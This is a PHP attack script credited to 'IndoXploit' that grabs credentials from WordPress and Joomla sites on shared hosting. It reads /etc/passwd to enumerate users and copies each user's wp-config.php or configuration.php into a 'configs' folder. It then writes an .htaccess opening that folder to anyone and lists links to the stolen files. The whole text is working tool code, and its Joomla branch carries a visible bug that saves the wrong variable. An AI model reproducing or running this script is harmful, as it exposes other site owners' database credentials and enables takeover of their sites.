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- <?php
- // Tu5b0l3d
- // thx to: IndoXPloit, HNc
- // Config Wordpress and Joomla Grabber
- error_reporting(0);
- echo "<h1><center>Created By IndoXploit<br><a href='configs/'style='text-decoration:none;'>Open Configs</a></center><br></h1>";
- //$us = file_get_contents("/etc/passwd");
- $usa = fopen('/etc/passwd','r');
- $dir = mkdir('configs', 0777);
- $rrrr = "Options all \n DirectoryIndex configs.html \n Require None \n Satisfy Any";
- $frr = fopen('configs/.htaccess', 'w');
- fwrite($frr, $rrrr);
- while($us = fgets($usa)){
- if($us==""){
- echo "cann't read /etc/passwd";
- }
- else{
- preg_match_all('/(.*?):x:/', $us, $user_byk);
- foreach($user_byk[1] as $user){
- $dir1 = "/home/$user/public_html/";
- if(is_readable($dir1)){
- $dir = "/home/$user/public_html/wp-config.php";
- $dir2 = "/home/$user/public_html/configuration.php";
- $ambil = file_get_contents($dir);
- if($ambil==""){
- $ambil_joom = file_get_contents($dir2);
- if($ambil_joom==""){
- echo "<font color='green'>$user <= Readable (Bukan Wordpress dan Joomla)<br></font>";
- }
- else{
- $file1 = "configs/$user-configuration.txt";
- $fp2 = fopen($file1,"w");
- fputs($fp2,$ambil);
- echo "<a href='configs/$user-configuration.txt'style='text-decoration:none;'>$user </a> <= Joomla<br>";
- }
- }
- else{
- $file1 = "configs/$user-wpconfig.txt";
- $fp2 = fopen($file1,"w");
- fputs($fp2,$ambil);
- echo "<a href='configs/$user-wpconfig.txt'style='text-decoration:none;'>$user </a> <= Wordpress<br>";
- }
- }
- else{
- }
- }
- }
- }
- ?>
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